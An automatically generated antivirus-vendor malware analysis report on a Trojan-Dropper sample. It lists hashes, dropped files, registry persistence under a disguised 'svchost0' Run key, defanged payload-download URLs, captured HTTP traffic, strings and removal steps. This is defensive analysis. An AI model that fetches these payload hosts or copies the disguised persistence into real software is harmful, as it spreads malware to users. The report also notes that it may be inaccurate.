Gen.Variant.Barys.56335_f09eaf98a7

by malwarelabrobot on April 24th, 2017 in Malware Descriptions.

Trojan.GenericKD.4838176 (BitDefender), Trojan-Dropper.Win32.Sysn.cenj (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.Baidu.1871 (DrWeb), Trojan.GenericKD.4838176 (B) (Emsisoft), Artemis!F09EAF98A70C (McAfee), SecurityRisk.gen1 (Symantec), Trojan.GenericKD.4838176 (FSecure), Generic38.BIRH (AVG), Win32:Malware-gen (Avast), Gen:Variant.Barys.56335 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f09eaf98a70ce17f490d7f38c3fea3ca
SHA1: 13c1a78ae7b91aee13ddcedd2f20169f74f17c13
SHA256: aaf69cdef8acc6487d416a9458462442d40bf83107254d6aaaba21f78d76878a
SSDeep: 12288:7XwOrReFWQFdeh4GSezhMCD/QplmW7NTXX1hb2lM6Vsj:7XwOrRshgjQCE3z1hmfVS
Size: 458915 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-31 02:38:51
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1024
setup.exe:1692
Bind.exe:3776
uc.exe:3144
setup.tmp:3172

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (788 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000 (0 bytes)

The process setup.exe:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-0606L.tmp\setup.tmp (1423 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-0606L.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-0606L.tmp\setup.tmp (0 bytes)

The process Bind.exe:3776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_f_4730_(Build1702151518).exe (926095 bytes)

The process setup.tmp:3172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\lll\Bind.exe (49 bytes)
%Program Files%\lll\is-SN6NI.tmp (23961 bytes)
%Program Files%\lll\unins000.dat (1376 bytes)
%Program Files%\lll\yyy.ini (25 bytes)
%Program Files%\lll\is-KLOJP.tmp (49 bytes)
%Program Files%\lll\is-CHKF7.tmp (673 bytes)
%Program Files%\lll\uc.exe (147 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Bind.exe:3776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process uc.exe:3144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\lll\uc.exe"

The process setup.tmp:3172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"RegFilesHash" = "2C 4C 49 ED 65 8F 74 92 99 64 09 F3 4F 5F 31 52"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files%\lll\uc.exe, %Program Files%\lll\Bind.exe"
"SessionHash" = "F5 30 93 F5 7E 25 C3 7D 7F E4 F0 4C 99 25 86 31"
"Owner" = "64 0C 00 00 C4 47 1E FB D4 BB D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

Dropped PE files

MD5 File path
86b7f4a91af28ca519e1de52916cf688 c:\Program Files\lll\Bind.exe
08200a6b207e50a87375dc7c82908d06 c:\Program Files\lll\uc.exe
14023e92a84f8a82c10a6a1d6b1182be c:\Program Files\lll\unins000.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Oleg N. Scherbakov
Product Name: 7-Zip SFX
Product Version: 1.6.0.2712
Legal Copyright: Copyright (c) 2005-2012 Oleg N. Scherbakov
Legal Trademarks:
Original Filename: 7ZSfxMod_x86.exe
Internal Name: 7ZSfxMod
File Version: 1.6.0.2712
File Description: 7z Setup SFX (x86)
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 101854 101888 4.62608 0c04e49d78a3c453186c916e6f29540d
.rdata 106496 15306 15360 3.96022 1eff757b36a6b7a599236ac8b1b35b4d
.data 122880 19948 2560 3.08518 21d5c7a8ba54658b1e07909bf1045c79
.rsrc 143360 6124 6144 2.44721 8a4ce16b05b7e5db4cc67ec2b030ef27

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 7
712fe060095354d46e56453a9e89361a
53aab8f119044b5d5acf11b1e9e1a752
b6531269133af53933634722c54f1018
c59ec9aa2900d0444e445184b567cb8f
f7ee0c604322fd2ecde860d9e255e401
018dc6096ab70a223715be23a7529094
b74229149dee4708eeb55641b246cf2c

URLs

URL IP
hxxp://www.guoneizhu.com/uc222.txt
hxxp://www.guoneizhu.com/Browser_V6.0.1471.913_f_4730_(Build1702151518).exe


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /uc222.txt HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 18 Apr 2017 07:17:26 GMT
Accept-Ranges: bytes
ETag: "c4fde1d413b8d21:0"
Server: Microsoft-IIS/10.0
Date: Sun, 23 Apr 2017 01:55:58 GMT
Content-Length: 362
hXXp://VVV.guoneizhu.com/Browser_V6.0.1471.913_f_4730_(Build1702151518
).exe Browser_V6.0.1471.913_f_4730_(Build1702151518).exe..hXXp://VVV.g
uoneizhu.com/FlowSpritSetup_slnt_5016.exe FlowSpritSetup_slnt_5016.exe
..hXXp://VVV.guoneizhu.com/PSoft_4010_1.0.0.104_Setup.exe PSoft_4010_1
.0.0.104_Setup.exe..hXXp://VVV.guoneizhu.com/MagicDiskSetup.exe MagicD
iskSetup.exe....


GET /Browser_V6.0.1471.913_f_4730_(Build1702151518).exe HTTP/1.1


Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 21 Feb 2017 14:09:35 GMT
Accept-Ranges: bytes
ETag: "e7c03c214c8cd21:0"
Server: Microsoft-IIS/10.0
Date: Sun, 23 Apr 2017 01:55:58 GMT
Content-Length: 51185040
MZ......................@...................................H.........
..!..L.!This program cannot be run in DOS mode....$.......]....o...o..
.o....]..o...._..o....^.;o...6...o....k..o..w4...o..w4..Xo..w4..[o....
X..o..w2...o....C.>o...o...m...4..Xo...4...o...4..]o...4...o...4S..
o...o;..o...4...o..Rich.o..........................PE..L...Y..X.......
.............................. ....@..........................`...... 
'..................................Y.......T.......h................3.
......n..@...T...............................@........................
....................text...I........................... ..`.data...<
;e... ......................@....idata...,...........&..............@.
.@.gfids..(............T..............@..@.tls.................X......
........@....rsrc...h............Z..............@..@.reloc...n.......p
...b..............@..B................................................
......................................................................
....................................................A.......J...A...A.
..A...A...A...A...A...A...A...A...A...A.3.A.'.A.?.A.Z.A.u.A...A...A.p.
A...........J...J...J.)JK.mhL...L.o.L......... .E...........L...L..KK.
................{.6.5.1.2.2.C.B.0.-.E.A.0.F.-.4.7.D.F.-.A.9.5.3.-.0.1.
7.1.7.0.E.D.1.2.F.9.}.....{.4.e.a.1.6.a.c.7.-.f.d.5.a.-.4.7.c.3.-.8.7.
5.b.-.d.b.f.4.a.2.0.0.8.c.2.0.}.....{.8.B.A.9.8.6.D.A.-.5.1.0.0.-.4.0.
5.E.-.A.A.3.5.-.8.6.F.3.4.A.0.2.A.C.B.F.}.....{.4.D.C.8.B.4.C.A.-.1.B.
D.A.-.4.8.3.e.-.B.5.F.A.-.D.3.C.1.2.E.1.5.B.6.2.D.}.......E.-.-.c.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

uc.exe_3144:

.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\*.*
%s\%s
@.reloc
GetProcessWindowStation
"%/28;=#$019:>?
mgM
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1 1@1`1|1
8 8$80848
%Program Files%\lll\uc.exe
<assemblyIdentity version="9.4.3.2"
<requestedExecutionLevel
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\aa.lnk
Chrome_WidgetWin_1
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
C:\Users\Public\Desktop\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
%s\Internet Explorer\iexplore.exe
http\shell\open\command
qqbrowser.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
%s\UCBrowser.exe
mscoree.dll
@KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
index.dat
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
InstallerSuccessLaunchCmdLine
Software\Microsoft\Windows\CurrentVersion\Run
\UUC0789.exe

Bind.exe_3776:

.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\lll\Bind.exe
1, 0, 0, 1
Bind.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1024
    setup.exe:1692
    Bind.exe:3776
    uc.exe:3144
    setup.tmp:3172

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (788 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-0606L.tmp\setup.tmp (1423 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_f_4730_(Build1702151518).exe (926095 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp\_isetup\_shfoldr.dll (47 bytes)
    %Program Files%\lll\Bind.exe (49 bytes)
    %Program Files%\lll\is-SN6NI.tmp (23961 bytes)
    %Program Files%\lll\unins000.dat (1376 bytes)
    %Program Files%\lll\yyy.ini (25 bytes)
    %Program Files%\lll\is-KLOJP.tmp (49 bytes)
    %Program Files%\lll\is-CHKF7.tmp (673 bytes)
    %Program Files%\lll\uc.exe (147 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "svchost0" = "%Program Files%\lll\uc.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now